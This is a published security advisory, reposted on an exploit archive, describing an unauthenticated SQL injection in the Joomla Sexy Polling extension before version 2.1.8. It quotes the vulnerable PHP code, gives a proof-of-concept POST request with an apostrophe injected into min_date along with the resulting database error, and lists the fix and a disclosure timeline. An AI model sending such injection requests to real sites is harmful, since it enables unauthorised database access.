exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Sexy Polling 2.1.7 SQL Injection

Joomla Sexy Polling 2.1.7 SQL Injection
Posted Apr 25, 2022
Authored by Wolfgang Hotwagner | Site ait.ac.at

Joomla Sexy Polling extension versions 2.1.7 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | ab42ffe9b13364d13f5df75df35c253f1a2fd02683b400ca78e054e1a31cde69

Joomla Sexy Polling 2.1.7 SQL Injection

Change Mirror Download
SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |


Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.


Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

These are later used unfiltered by the WHERE clause:

```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";

//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```

The HTTP-Resoonse contains a mysql error:

```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```

Vulnerable Versions
================
All versions below version 2.1.8

Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7

Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation
=========
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close